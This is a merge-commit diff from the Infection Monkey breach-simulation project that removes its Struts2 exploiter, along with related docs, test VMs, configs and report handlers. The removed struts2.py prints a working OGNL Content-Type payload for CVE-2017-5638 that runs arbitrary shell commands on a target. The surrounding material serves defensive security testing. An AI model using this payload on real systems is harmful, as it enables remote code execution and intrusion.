Merge pull request #1873 from guardicore/1869-remove-struts2-exploit

Remove Struts2 exploiter
2022-04-10 09:39:37 -04:00 · 2022-04-10 09:39:37 -04:00 · 727f19ecf6
parent f9a6d13f3a 4793e81831
commit 727f19ecf6
22 changed files with 1 additions and 307 deletions
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@ -54,6 +54,7 @@ Changelog](https://keepachangelog.com/en/1.0.0/).
 - 32-bit agents. #1675
 - Log path config options. #1761
 - "smb_service_name" option. #1741
+- Struts2 exploiter. #1869

 ### Fixed
 - A bug in network map page that caused delay of telemetry log loading. #1545
--- a/docs/content/reference/exploiters/Struts2.md
+++ b/docs/content/reference/exploiters/Struts2.md
@ -1,9 +0,0 @@
---
-title: "Struts2"
-date: 2020-07-14T08:42:30+03:00
-draft: false
-tags: ["exploit", "linux", "windows"]
---
-### Description
-
-This exploit, CVE-2017-5638, utilizes the Struts 2 Java web framework. The logic is based on [VEX WOO's PoC](https://www.exploit-db.com/exploits/41570).
--- a/envs/monkey_zoo/blackbox/config_templates/performance.py
+++ b/envs/monkey_zoo/blackbox/config_templates/performance.py
@ -16,7 +16,6 @@ class Performance(ConfigTemplate):
            "SmbExploiter",
            "WmiExploiter",
            "SSHExploiter",
-            "Struts2Exploiter",
            "WebLogicExploiter",
            "HadoopExploiter",
            "MSSQLExploiter",
@ -27,8 +26,6 @@ class Performance(ConfigTemplate):
        "basic_network.network_analysis.inaccessible_subnets": [
            "10.2.2.0/30",
            "10.2.2.8/30",
-            "10.2.2.24/32",
-            "10.2.2.23/32",
            "10.2.2.21/32",
            "10.2.2.19/32",
            "10.2.2.18/32",
@ -53,8 +50,6 @@ class Performance(ConfigTemplate):
            "10.2.2.19",
            "10.2.2.20",
            "10.2.2.21",
-            "10.2.2.23",
-            "10.2.2.24",
            "10.2.2.25",
            "10.2.3.55",
            "10.2.3.56",
--- a/envs/monkey_zoo/blackbox/config_templates/struts2.py
+++ b/envs/monkey_zoo/blackbox/config_templates/struts2.py
@ -1,19 +0,0 @@
-from copy import copy
-
-from envs.monkey_zoo.blackbox.config_templates.base_template import BaseTemplate
-from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemplate
-
-
-class Struts2(ConfigTemplate):
-
-    config_values = copy(BaseTemplate.config_values)
-
-    config_values.update(
-        {
-            "basic.exploiters.exploiter_classes": ["Struts2Exploiter"],
-            "basic_network.scope.depth": 2,
-            "basic_network.scope.subnet_scan_list": ["10.2.2.23", "10.2.2.24"],
-            "internal.network.tcp_scanner.HTTP_PORTS": [80, 8080],
-            "internal.network.tcp_scanner.tcp_target_ports": [80, 8080],
-        }
-    )
--- a/envs/monkey_zoo/blackbox/gcp_test_machine_list.py
+++ b/envs/monkey_zoo/blackbox/gcp_test_machine_list.py
@ -7,8 +7,6 @@ GCP_TEST_MACHINE_LIST = {
        "mssql-16",
        "mimikatz-14",
        "mimikatz-15",
-        "struts2-23",
-        "struts2-24",
        "tunneling-9",
        "tunneling-10",
        "tunneling-11",
--- a/envs/monkey_zoo/blackbox/test_blackbox.py
+++ b/envs/monkey_zoo/blackbox/test_blackbox.py
@ -22,7 +22,6 @@ from envs.monkey_zoo.blackbox.config_templates.powershell_credentials_reuse impo
 from envs.monkey_zoo.blackbox.config_templates.smb_mimikatz import SmbMimikatz
 from envs.monkey_zoo.blackbox.config_templates.smb_pth import SmbPth
 from envs.monkey_zoo.blackbox.config_templates.ssh import Ssh
-from envs.monkey_zoo.blackbox.config_templates.struts2 import Struts2
 from envs.monkey_zoo.blackbox.config_templates.tunneling import Tunneling
 from envs.monkey_zoo.blackbox.config_templates.weblogic import Weblogic
 from envs.monkey_zoo.blackbox.config_templates.wmi_mimikatz import WmiMimikatz
@ -190,10 +189,6 @@ class TestMonkeyBlackbox:
    def test_drupal_exploiter(self, island_client):
        TestMonkeyBlackbox.run_exploitation_test(island_client, Drupal, "Drupal_exploiter")

-    @pytest.mark.skip(reason="Struts2 exploiter is deprecated")
-    def test_struts_exploiter(self, island_client):
-        TestMonkeyBlackbox.run_exploitation_test(island_client, Struts2, "Struts2_exploiter")
-
    @pytest.mark.skip(reason="Weblogic exploiter is deprecated")
    def test_weblogic_exploiter(self, island_client):
        TestMonkeyBlackbox.run_exploitation_test(island_client, Weblogic, "Weblogic_exploiter")
--- a/envs/monkey_zoo/blackbox/utils/config_generation_script.py
+++ b/envs/monkey_zoo/blackbox/utils/config_generation_script.py
@ -14,7 +14,6 @@ from envs.monkey_zoo.blackbox.config_templates.powershell import PowerShell
 from envs.monkey_zoo.blackbox.config_templates.smb_mimikatz import SmbMimikatz
 from envs.monkey_zoo.blackbox.config_templates.smb_pth import SmbPth
 from envs.monkey_zoo.blackbox.config_templates.ssh import Ssh
-from envs.monkey_zoo.blackbox.config_templates.struts2 import Struts2
 from envs.monkey_zoo.blackbox.config_templates.tunneling import Tunneling
 from envs.monkey_zoo.blackbox.config_templates.weblogic import Weblogic
 from envs.monkey_zoo.blackbox.config_templates.wmi_mimikatz import WmiMimikatz
@ -45,7 +44,6 @@ CONFIG_TEMPLATES = [
    SmbMimikatz,
    SmbPth,
    Ssh,
-    Struts2,
    Tunneling,
    Weblogic,
    WmiMimikatz,
--- a/envs/monkey_zoo/docs/fullDocs.md
+++ b/envs/monkey_zoo/docs/fullDocs.md
@ -22,8 +22,6 @@ This document describes Infection Monkey’s test network, how to deploy and use
 [Nr. 19 WebLogic](#_Toc526517181)<br>
 [Nr. 21 Scan](#_Toc526517196)<br>
 [Nr. 22 Scan](#_Toc526517197)<br>
-[Nr. 23 Struts2](#_Toc536021476)<br>
-[Nr. 24 Struts2](#_Toc536021477)<br>
 [Nr. 25 Zerologon](#_Toc536021478)<br>
 [Nr. 3-45 Powershell](#_Toc536021479)<br>
 [Nr. 3-46 Powershell](#_Toc536021480)<br>
@ -776,74 +774,6 @@ Update all requirements using deployment script:<br>
 </tbody>
 </table>

-<table>
-<thead>
-<tr class="header">
-<th><p><span id="_Toc536021476" class="anchor"></span>Nr. <strong>23</strong> Struts2</p>
-<p>(10.2.2.23)</p></th>
-<th>(Vulnerable)</th>
-</tr>
-</thead>
-<tbody>
-<tr class="odd">
-<td>OS:</td>
-<td><strong>Ubuntu 16.04.05 x64</strong></td>
-</tr>
-<tr class="even">
-<td>Software:</td>
-<td><p>JDK,</p>
-<p>struts2 2.3.15.1,</p>
-<p>tomcat 9.0.0.M9</p></td>
-</tr>
-<tr class="odd">
-<td>Default server’s port:</td>
-<td>8080</td>
-</tr>
-<tr class="even">
-<td>Server’s config:</td>
-<td>Default</td>
-</tr>
-<tr class="odd">
-<td>Notes:</td>
-<td></td>
-</tr>
-</tbody>
-</table>
-
-<table>
-<thead>
-<tr class="header">
-<th><p><span id="_Toc536021477" class="anchor"></span>Nr. <strong>24</strong> Struts2</p>
-<p>(10.2.2.24)</p></th>
-<th>(Vulnerable)</th>
-</tr>
-</thead>
-<tbody>
-<tr class="odd">
-<td>OS:</td>
-<td><strong>Windows 10 x64</strong></td>
-</tr>
-<tr class="even">
-<td>Software:</td>
-<td><p>JDK,</p>
-<p>struts2 2.3.15.1,</p>
-<p>tomcat 9.0.0.M9</p></td>
-</tr>
-<tr class="odd">
-<td>Default server’s port:</td>
-<td>8080</td>
-</tr>
-<tr class="even">
-<td>Server’s config:</td>
-<td>Default</td>
-</tr>
-<tr class="odd">
-<td>Notes:</td>
-<td></td>
-</tr>
-</tbody>
-</table>
-
 <table>
 <thead>
 <tr class="header">
--- a/envs/monkey_zoo/terraform/images.tf
+++ b/envs/monkey_zoo/terraform/images.tf
@ -99,14 +99,6 @@ data "google_compute_image" "scan-22" {
  name = "scan-22"
  project = local.monkeyzoo_project
 }
-data "google_compute_image" "struts2-23" {
-  name = "struts2-23"
-  project = local.monkeyzoo_project
-}
-data "google_compute_image" "struts2-24" {
-  name = "struts2-24"
-  project = local.monkeyzoo_project
-}
 data "google_compute_image" "zerologon-25" {
  name = "zerologon-25"
  project = local.monkeyzoo_project
--- a/envs/monkey_zoo/terraform/monkey_zoo.tf
+++ b/envs/monkey_zoo/terraform/monkey_zoo.tf
@ -480,36 +480,6 @@ resource "google_compute_instance_from_template" "scan-22" {
  }
 }

-resource "google_compute_instance_from_template" "struts2-23" {
-  name = "${local.resource_prefix}struts2-23"
-  source_instance_template = local.default_ubuntu
-  boot_disk{
-    initialize_params {
-      image = data.google_compute_image.struts2-23.self_link
-    }
-    auto_delete = true
-  }
-  network_interface {
-    subnetwork="${local.resource_prefix}monkeyzoo-main"
-    network_ip="10.2.2.23"
-  }
-}
-
-resource "google_compute_instance_from_template" "struts2-24" {
-  name = "${local.resource_prefix}struts2-24"
-  source_instance_template = local.default_windows
-  boot_disk{
-    initialize_params {
-      image = data.google_compute_image.struts2-24.self_link
-    }
-    auto_delete = true
-  }
-  network_interface {
-    subnetwork="${local.resource_prefix}monkeyzoo-main"
-    network_ip="10.2.2.24"
-  }
-}
-
 resource "google_compute_instance_from_template" "zerologon-25" {
  name = "${local.resource_prefix}zerologon-25"
  source_instance_template = local.default_windows
--- a/monkey/infection_monkey/exploit/struts2.py
+++ b/monkey/infection_monkey/exploit/struts2.py
@ -1,90 +0,0 @@
-"""
-    Implementation is based on Struts2 jakarta multiparser RCE exploit ( CVE-2017-5638 )
-    code used is from https://www.exploit-db.com/exploits/41570/
-    Vulnerable struts2 versions <=2.3.31 and <=2.5.10
-"""
-import http.client
-import logging
-import re
-import ssl
-import urllib.error
-import urllib.parse
-import urllib.request
-from typing import List, Tuple
-
-from infection_monkey.exploit.web_rce import WebRCE
-
-logger = logging.getLogger(__name__)
-
-DOWNLOAD_TIMEOUT = 300
-
-
-class Struts2Exploiter(WebRCE):
-    _EXPLOITED_SERVICE = "Struts2"
-
-    def __init__(self, host):
-        super(Struts2Exploiter, self).__init__(host, None)
-
-    def get_exploit_config(self):
-        exploit_config = super(Struts2Exploiter, self).get_exploit_config()
-        exploit_config["dropper"] = True
-        return exploit_config
-
-    @staticmethod
-    def build_potential_urls(ip: str, ports: List[Tuple[str, bool]], extensions=None) -> List[str]:
-        url_list = WebRCE.build_potential_urls(ip, ports)
-        url_list = [Struts2Exploiter.get_redirected(url) for url in url_list]
-        return url_list
-
-    @staticmethod
-    def get_redirected(url):
-        # Returns false if url is not right
-        headers = {"User-Agent": "Mozilla/5.0"}
-        request = urllib.request.Request(url, headers=headers)
-        try:
-            return urllib.request.urlopen(
-                request, context=ssl._create_unverified_context()  # noqa: DUO122
-            ).geturl()
-        except urllib.error.URLError:
-            logger.error("Can't reach struts2 server")
-            return False
-
-    def exploit(self, url, cmd):
-        """
-        :param url: Full url to send request to
-        :param cmd: Code to try and execute on host
-        :return: response
-        """
-        cmd = re.sub(r"\\", r"\\\\", cmd)
-        cmd = re.sub(r"'", r"\\'", cmd)
-        payload = (
-            "%%{(#_='multipart/form-data')."
-            "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
-            "(#_memberAccess?"
-            "(#_memberAccess=#dm):"
-            "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
-            "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
-            "(#ognlUtil.getExcludedPackageNames().clear())."
-            "(#ognlUtil.getExcludedClasses().clear())."
-            "(#context.setMemberAccess(#dm))))."
-            "(#cmd='%s')."
-            "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
-            "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
-            "(#p=new java.lang.ProcessBuilder(#cmds))."
-            "(#p.redirectErrorStream(true)).(#process=#p.start())."
-            "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
-            "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
-            "(#ros.flush())}" % cmd
-        )
-        headers = {"User-Agent": "Mozilla/5.0", "Content-Type": payload}
-        try:
-            request = urllib.request.Request(url, headers=headers)
-            # Timeout added or else we would wait for all monkeys' output
-            page = urllib.request.urlopen(request).read()
-        except AttributeError:
-            # If url does not exist
-            return False
-        except http.client.IncompleteRead as e:
-            page = e.partial.decode()
-
-        return page
--- a/monkey/monkey_island/cc/services/config_schema/basic.py
+++ b/monkey/monkey_island/cc/services/config_schema/basic.py
@ -18,7 +18,6 @@ BASIC = {
                        "WmiExploiter",
                        "SSHExploiter",
                        "Log4ShellExploiter",
-                        "Struts2Exploiter",
                        "WebLogicExploiter",
                        "HadoopExploiter",
                        "MSSQLExploiter",
--- a/monkey/monkey_island/cc/services/config_schema/definitions/exploiter_classes.py
+++ b/monkey/monkey_island/cc/services/config_schema/definitions/exploiter_classes.py
@ -53,15 +53,6 @@ EXPLOITER_CLASSES = {
            "link": "https://www.guardicore.com/infectionmonkey/docs/reference"
            "/exploiters/sshexec/",
        },
-        {
-            "type": "string",
-            "enum": ["Struts2Exploiter"],
-            "title": "Struts2 Exploiter",
-            "safe": True,
-            "info": "Exploits struts2 java web framework. CVE-2017-5638. Logic based on "
-            "https://www.exploit-db.com/exploits/41570 .",
-            "link": "https://www.guardicore.com/infectionmonkey/docs/reference/exploiters/struts2/",
-        },
        {
            "type": "string",
            "enum": ["WebLogicExploiter"],
--- a/monkey/monkey_island/cc/services/reporting/aws_exporter.py
+++ b/monkey/monkey_island/cc/services/reporting/aws_exporter.py
@ -81,7 +81,6 @@ class AWSExporter(Exporter):
            "shared_passwords_domain": AWSExporter._handle_shared_passwords_domain_issue,
            "shared_admins_domain": AWSExporter._handle_shared_admins_domain_issue,
            "strong_users_on_crit": AWSExporter._handle_strong_users_on_crit_issue,
-            ExploiterDescriptorEnum.STRUTS2.value.class_name: AWSExporter._handle_struts2_issue,
            ExploiterDescriptorEnum.WEBLOGIC.value.class_name: AWSExporter._handle_weblogic_issue,
            ExploiterDescriptorEnum.HADOOP.value.class_name: AWSExporter._handle_hadoop_issue,
        }
@ -387,24 +386,6 @@ class AWSExporter(Exporter):
            instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
        )

-    @staticmethod
-    def _handle_struts2_issue(issue, instance_arn):
-
-        return AWSExporter._build_generic_finding(
-            severity=10,
-            title="Struts2 servers are vulnerable to remote code execution.",
-            description="Upgrade Struts2 to version 2.3.32 or 2.5.10.1 or any later versions.",
-            recommendation="Struts2 server at {machine} ({ip_address}) is vulnerable to "
-            "remote code execution attack."
-            "The attack was made possible because the server is using an old "
-            "version of Jakarta based file "
-            "upload Multipart parser.".format(
-                machine=issue["machine"], ip_address=issue["ip_address"]
-            ),
-            instance_arn=instance_arn,
-            instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
-        )
-
    @staticmethod
    def _handle_weblogic_issue(issue, instance_arn):

--- a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py
+++ b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py
@ -28,7 +28,6 @@ class ExploiterDescriptorEnum(Enum):
    SMB = ExploiterDescriptor("SmbExploiter", "SMB Exploiter", CredExploitProcessor)
    WMI = ExploiterDescriptor("WmiExploiter", "WMI Exploiter", CredExploitProcessor)
    SSH = ExploiterDescriptor("SSHExploiter", "SSH Exploiter", CredExploitProcessor)
-    STRUTS2 = ExploiterDescriptor("Struts2Exploiter", "Struts2 Exploiter", ExploitProcessor)
    WEBLOGIC = ExploiterDescriptor(
        "WebLogicExploiter", "Oracle WebLogic Exploiter", ExploitProcessor
    )
--- a/monkey/monkey_island/cc/ui/src/components/report-components/SecurityReport.js
+++ b/monkey/monkey_island/cc/ui/src/components/report-components/SecurityReport.js
@ -20,7 +20,6 @@ import guardicoreLogoImage from '../../images/guardicore-logo.png'
 import {faExclamationTriangle} from '@fortawesome/free-solid-svg-icons';
 import '../../styles/App.css';
 import {smbPasswordReport, smbPthReport} from './security/issues/SmbIssue';
-import {struts2IssueOverview, struts2IssueReport} from './security/issues/Struts2Issue';
 import {webLogicIssueOverview, webLogicIssueReport} from './security/issues/WebLogicIssue';
 import {hadoopIssueOverview, hadoopIssueReport} from './security/issues/HadoopIssue';
 import {mssqlIssueOverview, mssqlIssueReport} from './security/issues/MssqlIssue';
@ -78,11 +77,6 @@ class ReportPageComponent extends AuthComponent {
        },
        [this.issueContentTypes.TYPE]: this.issueTypes.DANGER
      },
-      'Struts2Exploiter': {
-        [this.issueContentTypes.OVERVIEW]: struts2IssueOverview,
-        [this.issueContentTypes.REPORT]: struts2IssueReport,
-        [this.issueContentTypes.TYPE]: this.issueTypes.DANGER
-      },
      'WebLogicExploiter': {
        [this.issueContentTypes.OVERVIEW]: webLogicIssueOverview,
        [this.issueContentTypes.REPORT]: webLogicIssueReport,
--- a/monkey/monkey_island/cc/ui/src/components/report-components/security/issues/Struts2Issue.js
+++ b/monkey/monkey_island/cc/ui/src/components/report-components/security/issues/Struts2Issue.js
@ -1,26 +0,0 @@
-import React from 'react';
-import CollapsibleWellComponent from '../CollapsibleWell';
-
-export function struts2IssueOverview() {
-  return (<li>Struts2 servers are vulnerable to remote code execution. (<a
-                      href="https://cwiki.apache.org/confluence/display/WW/S2-045">
-                      CVE-2017-5638</a>)</li>)
-}
-
-export function struts2IssueReport(issue) {
-  return (
-      <>
-        Upgrade Struts2 to version 2.3.32 or 2.5.10.1 or any later versions.
-        <CollapsibleWellComponent>
-          Struts2 server at <span className="badge badge-primary">{issue.machine}</span> (<span
-          className="badge badge-info" style={{margin: '2px'}}>{issue.ip_address}</span>) is vulnerable to <span
-          className="badge badge-danger">remote code execution</span> attack.
-          <br/>
-          The attack was made possible because the server is using an old version of Jakarta based file upload
-          Multipart parser. For possible work-arounds and more info read <a
-          href="https://cwiki.apache.org/confluence/display/WW/S2-045"
-        >here</a>.
-        </CollapsibleWellComponent>
-      </>
-    );
-}
--- a/monkey/tests/data_for_tests/monkey_configs/automated_master_config.json
+++ b/monkey/tests/data_for_tests/monkey_configs/automated_master_config.json
@ -57,7 +57,6 @@
                    {"name": "DrupalExploiter", "supported_os": ["linux", "windows"], "options": {}},
                    {"name": "HadoopExploiter", "supported_os": ["linux", "windows"], "options": {}},
                    {"name": "ShellShockExploiter", "supported_os": ["linux"], "options": {}},
-                    {"name": "Struts2Exploiter", "supported_os": ["linux", "windows"], "options": {}},
                    {"name": "WebLogicExploiter", "supported_os": ["linux", "windows"], "options": {}},
                    {"name": "ZerologonExploiter", "supported_os": ["windows"], "options": {}}
                ]
--- a/monkey/tests/data_for_tests/monkey_configs/flat_config.json
+++ b/monkey/tests/data_for_tests/monkey_configs/flat_config.json
@ -49,7 +49,6 @@
        "SmbExploiter",
        "WmiExploiter",
        "SSHExploiter",
-        "Struts2Exploiter",
        "ZerologonExploiter",
        "WebLogicExploiter",
        "HadoopExploiter",
--- a/monkey/tests/data_for_tests/monkey_configs/monkey_config_standard.json
+++ b/monkey/tests/data_for_tests/monkey_configs/monkey_config_standard.json
@ -5,7 +5,6 @@
          "SmbExploiter",
          "WmiExploiter",
          "SSHExploiter",
-          "Struts2Exploiter",
          "WebLogicExploiter",
          "HadoopExploiter",
          "MSSQLExploiter",
--- a/monkey/tests/unit_tests/monkey_island/cc/services/test_config.py
+++ b/monkey/tests/unit_tests/monkey_island/cc/services/test_config.py
@ -202,7 +202,6 @@ def test_format_config_for_agent__exploiters(flat_monkey_config):
            {"name": "DrupalExploiter", "supported_os": [], "options": {}},
            {"name": "HadoopExploiter", "supported_os": ["linux", "windows"], "options": {}},
            {"name": "Log4ShellExploiter", "supported_os": ["linux", "windows"], "options": {}},
-            {"name": "Struts2Exploiter", "supported_os": [], "options": {}},
            {"name": "WebLogicExploiter", "supported_os": [], "options": {}},
            {"name": "ZerologonExploiter", "supported_os": ["windows"], "options": {}},
        ],
--- a/vulture_allowlist.py
+++ b/vulture_allowlist.py
@ -56,7 +56,6 @@ credential_type  # unused variable (monkey/monkey_island/cc/services/reporting/i
 password_restored  # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_report_info.py:23)
 SSH  # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:30)
 SAMBACRY  # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:31)
-STRUTS2  # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:39)
 WEBLOGIC  # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:40)
 HADOOP  # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:43)
 MSSQL  # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:44)